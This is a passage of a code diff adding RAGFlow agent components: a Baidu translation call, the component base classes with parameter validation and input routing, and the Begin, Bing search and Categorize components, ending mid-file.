+ elif self._param.trans_type == 'fieldtranslate':
83
+ domain = self._param.domain
84
+ sign = md5((appid + ans + salt + domain + secret_key).encode('utf-8')).hexdigest()
85
+ url = 'http://api.fanyi.baidu.com/api/trans/vip/fieldtranslate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&domain=' + domain + '&sign=' + sign
86
+ headers = {"Content-Type": "application/x-www-form-urlencoded"}
87
+ response = requests.post(url=url, headers=headers).json()
88
+
89
+ if response.get('error_code'):
90
+ BaiduFanyi.be_output("**Error**:" + response['error_msg'])
91
+
92
+ return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
93
+
94
+ except Exception as e:
95
+ BaiduFanyi.be_output("**Error**:" + str(e))
96
+
ragflow-main/agent/component/base.py ADDED
@@ -0,0 +1,586 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import builtins
18
+ import json
19
+ import os
20
+ import logging
21
+ from functools import partial
22
+ from typing import Tuple, Union
23
+
24
+ import pandas as pd
25
+
26
+ from agent import settings
27
+
28
+ _FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
29
+ _DEPRECATED_PARAMS = "_deprecated_params"
30
+ _USER_FEEDED_PARAMS = "_user_feeded_params"
31
+ _IS_RAW_CONF = "_is_raw_conf"
32
+
33
+
34
+ class ComponentParamBase(ABC):
35
+ def __init__(self):
36
+ self.output_var_name = "output"
37
+ self.message_history_window_size = 22
38
+ self.query = []
39
+ self.inputs = []
40
+ self.debug_inputs = []
41
+
42
+ def set_name(self, name: str):
43
+ self._name = name
44
+ return self
45
+
46
+ def check(self):
47
+ raise NotImplementedError("Parameter Object should be checked.")
48
+
49
+ @classmethod
50
+ def _get_or_init_deprecated_params_set(cls):
51
+ if not hasattr(cls, _DEPRECATED_PARAMS):
52
+ setattr(cls, _DEPRECATED_PARAMS, set())
53
+ return getattr(cls, _DEPRECATED_PARAMS)
54
+
55
+ def _get_or_init_feeded_deprecated_params_set(self, conf=None):
56
+ if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
57
+ if conf is None:
58
+ setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
59
+ else:
60
+ setattr(
61
+ self,
62
+ _FEEDED_DEPRECATED_PARAMS,
63
+ set(conf[_FEEDED_DEPRECATED_PARAMS]),
64
+ )
65
+ return getattr(self, _FEEDED_DEPRECATED_PARAMS)
66
+
67
+ def _get_or_init_user_feeded_params_set(self, conf=None):
68
+ if not hasattr(self, _USER_FEEDED_PARAMS):
69
+ if conf is None:
70
+ setattr(self, _USER_FEEDED_PARAMS, set())
71
+ else:
72
+ setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
73
+ return getattr(self, _USER_FEEDED_PARAMS)
74
+
75
+ def get_user_feeded(self):
76
+ return self._get_or_init_user_feeded_params_set()
77
+
78
+ def get_feeded_deprecated_params(self):
79
+ return self._get_or_init_feeded_deprecated_params_set()
80
+
81
+ @property
82
+ def _deprecated_params_set(self):
83
+ return {name: True for name in self.get_feeded_deprecated_params()}
84
+
85
+ def __str__(self):
86
+ return json.dumps(self.as_dict(), ensure_ascii=False)
87
+
88
+ def as_dict(self):
89
+ def _recursive_convert_obj_to_dict(obj):
90
+ ret_dict = {}
91
+ for attr_name in list(obj.__dict__):
92
+ if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
93
+ continue
94
+ # get attr
95
+ attr = getattr(obj, attr_name)
96
+ if isinstance(attr, pd.DataFrame):
97
+ ret_dict[attr_name] = attr.to_dict()
98
+ continue
99
+ if attr and type(attr).__name__ not in dir(builtins):
100
+ ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
101
+ else:
102
+ ret_dict[attr_name] = attr
103
+
104
+ return ret_dict
105
+
106
+ return _recursive_convert_obj_to_dict(self)
107
+
108
+ def update(self, conf, allow_redundant=False):
109
+ update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
110
+ if update_from_raw_conf:
111
+ deprecated_params_set = self._get_or_init_deprecated_params_set()
112
+ feeded_deprecated_params_set = (
113
+ self._get_or_init_feeded_deprecated_params_set()
114
+ )
115
+ user_feeded_params_set = self._get_or_init_user_feeded_params_set()
116
+ setattr(self, _IS_RAW_CONF, False)
117
+ else:
118
+ feeded_deprecated_params_set = (
119
+ self._get_or_init_feeded_deprecated_params_set(conf)
120
+ )
121
+ user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)
122
+
123
+ def _recursive_update_param(param, config, depth, prefix):
124
+ if depth > settings.PARAM_MAXDEPTH:
125
+ raise ValueError("Param define nesting too deep!!!, can not parse it")
126
+
127
+ inst_variables = param.__dict__
128
+ redundant_attrs = []
129
+ for config_key, config_value in config.items():
130
+ # redundant attr
131
+ if config_key not in inst_variables:
132
+ if not update_from_raw_conf and config_key.startswith("_"):
133
+ setattr(param, config_key, config_value)
134
+ else:
135
+ setattr(param, config_key, config_value)
136
+ # redundant_attrs.append(config_key)
137
+ continue
138
+
139
+ full_config_key = f"{prefix}{config_key}"
140
+
141
+ if update_from_raw_conf:
142
+ # add user feeded params
143
+ user_feeded_params_set.add(full_config_key)
144
+
145
+ # update user feeded deprecated param set
146
+ if full_config_key in deprecated_params_set:
147
+ feeded_deprecated_params_set.add(full_config_key)
148
+
149
+ # supported attr
150
+ attr = getattr(param, config_key)
151
+ if type(attr).__name__ in dir(builtins) or attr is None:
152
+ setattr(param, config_key, config_value)
153
+
154
+ else:
155
+ # recursive set obj attr
156
+ sub_params = _recursive_update_param(
157
+ attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
158
+ )
159
+ setattr(param, config_key, sub_params)
160
+
161
+ if not allow_redundant and redundant_attrs:
162
+ raise ValueError(
163
+ f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
164
+ )
165
+
166
+ return param
167
+
168
+ return _recursive_update_param(param=self, config=conf, depth=0, prefix="")
169
+
170
+ def extract_not_builtin(self):
171
+ def _get_not_builtin_types(obj):
172
+ ret_dict = {}
173
+ for variable in obj.__dict__:
174
+ attr = getattr(obj, variable)
175
+ if attr and type(attr).__name__ not in dir(builtins):
176
+ ret_dict[variable] = _get_not_builtin_types(attr)
177
+
178
+ return ret_dict
179
+
180
+ return _get_not_builtin_types(self)
181
+
182
+ def validate(self):
183
+ self.builtin_types = dir(builtins)
184
+ self.func = {
185
+ "ge": self._greater_equal_than,
186
+ "le": self._less_equal_than,
187
+ "in": self._in,
188
+ "not_in": self._not_in,
189
+ "range": self._range,
190
+ }
191
+ home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
192
+ param_validation_path_prefix = home_dir + "/param_validation/"
193
+
194
+ param_name = type(self).__name__
195
+ param_validation_path = "/".join(
196
+ [param_validation_path_prefix, param_name + ".json"]
197
+ )
198
+
199
+ validation_json = None
200
+
201
+ try:
202
+ with open(param_validation_path, "r") as fin:
203
+ validation_json = json.loads(fin.read())
204
+ except BaseException:
205
+ return
206
+
207
+ self._validate_param(self, validation_json)
208
+
209
+ def _validate_param(self, param_obj, validation_json):
210
+ default_section = type(param_obj).__name__
211
+ var_list = param_obj.__dict__
212
+
213
+ for variable in var_list:
214
+ attr = getattr(param_obj, variable)
215
+
216
+ if type(attr).__name__ in self.builtin_types or attr is None:
217
+ if variable not in validation_json:
218
+ continue
219
+
220
+ validation_dict = validation_json[default_section][variable]
221
+ value = getattr(param_obj, variable)
222
+ value_legal = False
223
+
224
+ for op_type in validation_dict:
225
+ if self.func[op_type](value, validation_dict[op_type]):
226
+ value_legal = True
227
+ break
228
+
229
+ if not value_legal:
230
+ raise ValueError(
231
+ "Plase check runtime conf, {} = {} does not match user-parameter restriction".format(
232
+ variable, value
233
+ )
234
+ )
235
+
236
+ elif variable in validation_json:
237
+ self._validate_param(attr, validation_json)
238
+
239
+ @staticmethod
240
+ def check_string(param, descr):
241
+ if type(param).__name__ not in ["str"]:
242
+ raise ValueError(
243
+ descr + " {} not supported, should be string type".format(param)
244
+ )
245
+
246
+ @staticmethod
247
+ def check_empty(param, descr):
248
+ if not param:
249
+ raise ValueError(
250
+ descr + " does not support empty value."
251
+ )
252
+
253
+ @staticmethod
254
+ def check_positive_integer(param, descr):
255
+ if type(param).__name__ not in ["int", "long"] or param <= 0:
256
+ raise ValueError(
257
+ descr + " {} not supported, should be positive integer".format(param)
258
+ )
259
+
260
+ @staticmethod
261
+ def check_positive_number(param, descr):
262
+ if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
263
+ raise ValueError(
264
+ descr + " {} not supported, should be positive numeric".format(param)
265
+ )
266
+
267
+ @staticmethod
268
+ def check_nonnegative_number(param, descr):
269
+ if type(param).__name__ not in ["float", "int", "long"] or param < 0:
270
+ raise ValueError(
271
+ descr
272
+ + " {} not supported, should be non-negative numeric".format(param)
273
+ )
274
+
275
+ @staticmethod
276
+ def check_decimal_float(param, descr):
277
+ if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
278
+ raise ValueError(
279
+ descr
280
+ + " {} not supported, should be a float number in range [0, 1]".format(
281
+ param
282
+ )
283
+ )
284
+
285
+ @staticmethod
286
+ def check_boolean(param, descr):
287
+ if type(param).__name__ != "bool":
288
+ raise ValueError(
289
+ descr + " {} not supported, should be bool type".format(param)
290
+ )
291
+
292
+ @staticmethod
293
+ def check_open_unit_interval(param, descr):
294
+ if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
295
+ raise ValueError(
296
+ descr + " should be a numeric number between 0 and 1 exclusively"
297
+ )
298
+
299
+ @staticmethod
300
+ def check_valid_value(param, descr, valid_values):
301
+ if param not in valid_values:
302
+ raise ValueError(
303
+ descr
304
+ + " {} is not supported, it should be in {}".format(param, valid_values)
305
+ )
306
+
307
+ @staticmethod
308
+ def check_defined_type(param, descr, types):
309
+ if type(param).__name__ not in types:
310
+ raise ValueError(
311
+ descr + " {} not supported, should be one of {}".format(param, types)
312
+ )
313
+
314
+ @staticmethod
315
+ def check_and_change_lower(param, valid_list, descr=""):
316
+ if type(param).__name__ != "str":
317
+ raise ValueError(
318
+ descr
319
+ + " {} not supported, should be one of {}".format(param, valid_list)
320
+ )
321
+
322
+ lower_param = param.lower()
323
+ if lower_param in valid_list:
324
+ return lower_param
325
+ else:
326
+ raise ValueError(
327
+ descr
328
+ + " {} not supported, should be one of {}".format(param, valid_list)
329
+ )
330
+
331
+ @staticmethod
332
+ def _greater_equal_than(value, limit):
333
+ return value >= limit - settings.FLOAT_ZERO
334
+
335
+ @staticmethod
336
+ def _less_equal_than(value, limit):
337
+ return value <= limit + settings.FLOAT_ZERO
338
+
339
+ @staticmethod
340
+ def _range(value, ranges):
341
+ in_range = False
342
+ for left_limit, right_limit in ranges:
343
+ if (
344
+ left_limit - settings.FLOAT_ZERO
345
+ <= value
346
+ <= right_limit + settings.FLOAT_ZERO
347
+ ):
348
+ in_range = True
349
+ break
350
+
351
+ return in_range
352
+
353
+ @staticmethod
354
+ def _in(value, right_value_list):
355
+ return value in right_value_list
356
+
357
+ @staticmethod
358
+ def _not_in(value, wrong_value_list):
359
+ return value not in wrong_value_list
360
+
361
+ def _warn_deprecated_param(self, param_name, descr):
362
+ if self._deprecated_params_set.get(param_name):
363
+ logging.warning(
364
+ f"{descr} {param_name} is deprecated and ignored in this version."
365
+ )
366
+
367
+ def _warn_to_deprecate_param(self, param_name, descr, new_param):
368
+ if self._deprecated_params_set.get(param_name):
369
+ logging.warning(
370
+ f"{descr} {param_name} will be deprecated in future release; "
371
+ f"please use {new_param} instead."
372
+ )
373
+ return True
374
+ return False
375
+
376
+
377
+ class ComponentBase(ABC):
378
+ component_name: str
379
+
380
+ def __str__(self):
381
+ """
382
+ {
383
+ "component_name": "Begin",
384
+ "params": {}
385
+ }
386
+ """
387
+ return """{{
388
+ "component_name": "{}",
389
+ "params": {},
390
+ "output": {},
391
+ "inputs": {}
392
+ }}""".format(self.component_name,
393
+ self._param,
394
+ json.dumps(json.loads(str(self._param)).get("output", {}), ensure_ascii=False),
395
+ json.dumps(json.loads(str(self._param)).get("inputs", []), ensure_ascii=False)
396
+ )
397
+
398
+ def __init__(self, canvas, id, param: ComponentParamBase):
399
+ self._canvas = canvas
400
+ self._id = id
401
+ self._param = param
402
+ self._param.check()
403
+
404
+ def get_dependent_components(self):
405
+ cpnts = set([para["component_id"].split("@")[0] for para in self._param.query \
406
+ if para.get("component_id") \
407
+ and para["component_id"].lower().find("answer") < 0 \
408
+ and para["component_id"].lower().find("begin") < 0])
409
+ return list(cpnts)
410
+
411
+ def run(self, history, **kwargs):
412
+ logging.debug("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
413
+ json.dumps(kwargs, ensure_ascii=False)))
414
+ self._param.debug_inputs = []
415
+ try:
416
+ res = self._run(history, **kwargs)
417
+ self.set_output(res)
418
+ except Exception as e:
419
+ self.set_output(pd.DataFrame([{"content": str(e)}]))
420
+ raise e
421
+
422
+ return res
423
+
424
+ def _run(self, history, **kwargs):
425
+ raise NotImplementedError()
426
+
427
+ def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
428
+ o = getattr(self._param, self._param.output_var_name)
429
+ if not isinstance(o, partial):
430
+ if not isinstance(o, pd.DataFrame):
431
+ if isinstance(o, list):
432
+ return self._param.output_var_name, pd.DataFrame(o)
433
+ if o is None:
434
+ return self._param.output_var_name, pd.DataFrame()
435
+ return self._param.output_var_name, pd.DataFrame([{"content": str(o)}])
436
+ return self._param.output_var_name, o
437
+
438
+ if allow_partial or not isinstance(o, partial):
439
+ if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
440
+ return pd.DataFrame(o if isinstance(o, list) else [o])
441
+ return self._param.output_var_name, o
442
+
443
+ outs = None
444
+ for oo in o():
445
+ if not isinstance(oo, pd.DataFrame):
446
+ outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
447
+ else:
448
+ outs = oo
449
+ return self._param.output_var_name, outs
450
+
451
+ def reset(self):
452
+ setattr(self._param, self._param.output_var_name, None)
453
+ self._param.inputs = []
454
+
455
+ def set_output(self, v):
456
+ setattr(self._param, self._param.output_var_name, v)
457
+
458
+ def get_input(self):
459
+ if self._param.debug_inputs:
460
+ return pd.DataFrame([{"content": v["value"]} for v in self._param.debug_inputs if v.get("value")])
461
+
462
+ reversed_cpnts = []
463
+ if len(self._canvas.path) > 1:
464
+ reversed_cpnts.extend(self._canvas.path[-2])
465
+ reversed_cpnts.extend(self._canvas.path[-1])
466
+
467
+ if self._param.query:
468
+ self._param.inputs = []
469
+ outs = []
470
+ for q in self._param.query:
471
+ if q.get("component_id"):
472
+ if q["component_id"].split("@")[0].lower().find("begin") >= 0:
473
+ cpn_id, key = q["component_id"].split("@")
474
+ for p in self._canvas.get_component(cpn_id)["obj"]._param.query:
475
+ if p["key"] == key:
476
+ outs.append(pd.DataFrame([{"content": p.get("value", "")}]))
477
+ self._param.inputs.append({"component_id": q["component_id"],
478
+ "content": p.get("value", "")})
479
+ break
480
+ else:
481
+ assert False, f"Can't find parameter '{key}' for {cpn_id}"
482
+ continue
483
+
484
+ if q["component_id"].lower().find("answer") == 0:
485
+ txt = []
486
+ for r, c in self._canvas.history[::-1][:self._param.message_history_window_size][::-1]:
487
+ txt.append(f"{r.upper()}: {c}")
488
+ txt = "\n".join(txt)
489
+ self._param.inputs.append({"content": txt, "component_id": q["component_id"]})
490
+ outs.append(pd.DataFrame([{"content": txt}]))
491
+ continue
492
+
493
+ outs.append(self._canvas.get_component(q["component_id"])["obj"].output(allow_partial=False)[1])
494
+ self._param.inputs.append({"component_id": q["component_id"],
495
+ "content": "\n".join(
496
+ [str(d["content"]) for d in outs[-1].to_dict('records')])})
497
+ elif q.get("value"):
498
+ self._param.inputs.append({"component_id": None, "content": q["value"]})
499
+ outs.append(pd.DataFrame([{"content": q["value"]}]))
500
+ if outs:
501
+ df = pd.concat(outs, ignore_index=True)
502
+ if "content" in df:
503
+ df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
504
+ return df
505
+
506
+ upstream_outs = []
507
+
508
+ for u in reversed_cpnts[::-1]:
509
+ if self.get_component_name(u) in ["switch", "concentrator"]:
510
+ continue
511
+ if self.component_name.lower() == "generate" and self.get_component_name(u) == "retrieval":
512
+ o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
513
+ if o is not None:
514
+ o["component_id"] = u
515
+ upstream_outs.append(o)
516
+ continue
517
+ #if self.component_name.lower()!="answer" and u not in self._canvas.get_component(self._id)["upstream"]: continue
518
+ if self.component_name.lower().find("switch") < 0 \
519
+ and self.get_component_name(u) in ["relevant", "categorize"]:
520
+ continue
521
+ if u.lower().find("answer") >= 0:
522
+ for r, c in self._canvas.history[::-1]:
523
+ if r == "user":
524
+ upstream_outs.append(pd.DataFrame([{"content": c, "component_id": u}]))
525
+ break
526
+ break
527
+ if self.component_name.lower().find("answer") >= 0 and self.get_component_name(u) in ["relevant"]:
528
+ continue
529
+ o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
530
+ if o is not None:
531
+ o["component_id"] = u
532
+ upstream_outs.append(o)
533
+ break
534
+
535
+ assert upstream_outs, "Can't inference the where the component input is. Please identify whose output is this component's input."
536
+
537
+ df = pd.concat(upstream_outs, ignore_index=True)
538
+ if "content" in df:
539
+ df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
540
+
541
+ self._param.inputs = []
542
+ for _, r in df.iterrows():
543
+ self._param.inputs.append({"component_id": r["component_id"], "content": r["content"]})
544
+
545
+ return df
546
+
547
+ def get_input_elements(self):
548
+ assert self._param.query, "Please identify input parameters firstly."
549
+ eles = []
550
+ for q in self._param.query:
551
+ if q.get("component_id"):
552
+ cpn_id = q["component_id"]
553
+ if cpn_id.split("@")[0].lower().find("begin") >= 0:
554
+ cpn_id, key = cpn_id.split("@")
555
+ eles.extend(self._canvas.get_component(cpn_id)["obj"]._param.query)
556
+ continue
557
+
558
+ eles.append({"name": self._canvas.get_compnent_name(cpn_id), "key": cpn_id})
559
+ else:
560
+ eles.append({"key": q["value"], "name": q["value"], "value": q["value"]})
561
+ return eles
562
+
563
+ def get_stream_input(self):
564
+ reversed_cpnts = []
565
+ if len(self._canvas.path) > 1:
566
+ reversed_cpnts.extend(self._canvas.path[-2])
567
+ reversed_cpnts.extend(self._canvas.path[-1])
568
+
569
+ for u in reversed_cpnts[::-1]:
570
+ if self.get_component_name(u) in ["switch", "answer"]:
571
+ continue
572
+ return self._canvas.get_component(u)["obj"].output()[1]
573
+
574
+ @staticmethod
575
+ def be_output(v):
576
+ return pd.DataFrame([{"content": v}])
577
+
578
+ def get_component_name(self, cpn_id):
579
+ return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
580
+
581
+ def debug(self, **kwargs):
582
+ return self._run([], **kwargs)
583
+
584
+ def get_parent(self):
585
+ pid = self._canvas.get_component(self._id)["parent_id"]
586
+ return self._canvas.get_component(pid)["obj"]
ragflow-main/agent/component/begin.py ADDED
@@ -0,0 +1,49 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from functools import partial
17
+ import pandas as pd
18
+ from agent.component.base import ComponentBase, ComponentParamBase
19
+
20
+
21
+ class BeginParam(ComponentParamBase):
22
+
23
+ """
24
+ Define the Begin component parameters.
25
+ """
26
+ def __init__(self):
27
+ super().__init__()
28
+ self.prologue = "Hi! I'm your smart assistant. What can I do for you?"
29
+ self.query = []
30
+
31
+ def check(self):
32
+ return True
33
+
34
+
35
+ class Begin(ComponentBase):
36
+ component_name = "Begin"
37
+
38
+ def _run(self, history, **kwargs):
39
+ if kwargs.get("stream"):
40
+ return partial(self.stream_output)
41
+ return pd.DataFrame([{"content": self._param.prologue}])
42
+
43
+ def stream_output(self):
44
+ res = {"content": self._param.prologue}
45
+ yield res
46
+ self.set_output(self.be_output(res))
47
+
48
+
49
+
ragflow-main/agent/component/bing.py ADDED
@@ -0,0 +1,84 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import requests
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+ class BingParam(ComponentParamBase):
23
+ """
24
+ Define the Bing component parameters.
25
+ """
26
+
27
+ def __init__(self):
28
+ super().__init__()
29
+ self.top_n = 10
30
+ self.channel = "Webpages"
31
+ self.api_key = "YOUR_ACCESS_KEY"
32
+ self.country = "CN"
33
+ self.language = "en"
34
+
35
+ def check(self):
36
+ self.check_positive_integer(self.top_n, "Top N")
37
+ self.check_valid_value(self.channel, "Bing Web Search or Bing News", ["Webpages", "News"])
38
+ self.check_empty(self.api_key, "Bing subscription key")
39
+ self.check_valid_value(self.country, "Bing Country",
40
+ ['AR', 'AU', 'AT', 'BE', 'BR', 'CA', 'CL', 'DK', 'FI', 'FR', 'DE', 'HK', 'IN', 'ID',
41
+ 'IT', 'JP', 'KR', 'MY', 'MX', 'NL', 'NZ', 'NO', 'CN', 'PL', 'PT', 'PH', 'RU', 'SA',
42
+ 'ZA', 'ES', 'SE', 'CH', 'TW', 'TR', 'GB', 'US'])
43
+ self.check_valid_value(self.language, "Bing Languages",
44
+ ['ar', 'eu', 'bn', 'bg', 'ca', 'ns', 'nt', 'hr', 'cs', 'da', 'nl', 'en', 'gb', 'et',
45
+ 'fi', 'fr', 'gl', 'de', 'gu', 'he', 'hi', 'hu', 'is', 'it', 'jp', 'kn', 'ko', 'lv',
46
+ 'lt', 'ms', 'ml', 'mr', 'nb', 'pl', 'br', 'pt', 'pa', 'ro', 'ru', 'sr', 'sk', 'sl',
47
+ 'es', 'sv', 'ta', 'te', 'th', 'tr', 'uk', 'vi'])
48
+
49
+
50
+ class Bing(ComponentBase, ABC):
51
+ component_name = "Bing"
52
+
53
+ def _run(self, history, **kwargs):
54
+ ans = self.get_input()
55
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
56
+ if not ans:
57
+ return Bing.be_output("")
58
+
59
+ try:
60
+ headers = {"Ocp-Apim-Subscription-Key": self._param.api_key, 'Accept-Language': self._param.language}
61
+ params = {"q": ans, "textDecorations": True, "textFormat": "HTML", "cc": self._param.country,
62
+ "answerCount": 1, "promote": self._param.channel}
63
+ if self._param.channel == "Webpages":
64
+ response = requests.get("https://api.bing.microsoft.com/v7.0/search", headers=headers, params=params)
65
+ response.raise_for_status()
66
+ search_results = response.json()
67
+ bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["snippet"]} for i in
68
+ search_results["webPages"]["value"]]
69
+ elif self._param.channel == "News":
70
+ response = requests.get("https://api.bing.microsoft.com/v7.0/news/search", headers=headers,
71
+ params=params)
72
+ response.raise_for_status()
73
+ search_results = response.json()
74
+ bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["description"]} for i
75
+ in search_results['news']['value']]
76
+ except Exception as e:
77
+ return Bing.be_output("**ERROR**: " + str(e))
78
+
79
+ if not bing_res:
80
+ return Bing.be_output("")
81
+
82
+ df = pd.DataFrame(bing_res)
83
+ logging.debug(f"df: {str(df)}")
84
+ return df
ragflow-main/agent/component/categorize.py ADDED
@@ -0,0 +1,98 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ from api.db import LLMType
19
+ from api.db.services.llm_service import LLMBundle
20
+ from agent.component import GenerateParam, Generate
21
+
22
+
23
+ class CategorizeParam(GenerateParam):
24
+
25
+ """
26
+ Define the Categorize component parameters.
27
+ """
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.category_description = {}
31
+ self.prompt = ""
32
+
33
+ def check(self):
34
+ super().check()
35
+ self.check_empty(self.category_description, "[Categorize] Category examples")
36
+ for k, v in self.category_description.items():
37
+ if not k:
38
+ raise ValueError("[Categorize] Category name can not be empty!")
39
+ if not v.get("to"):
40
+ raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")
41
+
42
+ def get_prompt(self, chat_hist):
43
+ cate_lines = []
44
+ for c, desc in self.category_description.items():
45
+ for line in desc.get("examples", "").split("\n"):
46
+ if not line:
47
+ continue
48
+ cate_lines.append("USER: {}\nCategory: {}".format(line, c))
49
+ descriptions = []
50
+ for c, desc in self.category_description.items():
51
+ if desc.get("description"):
52
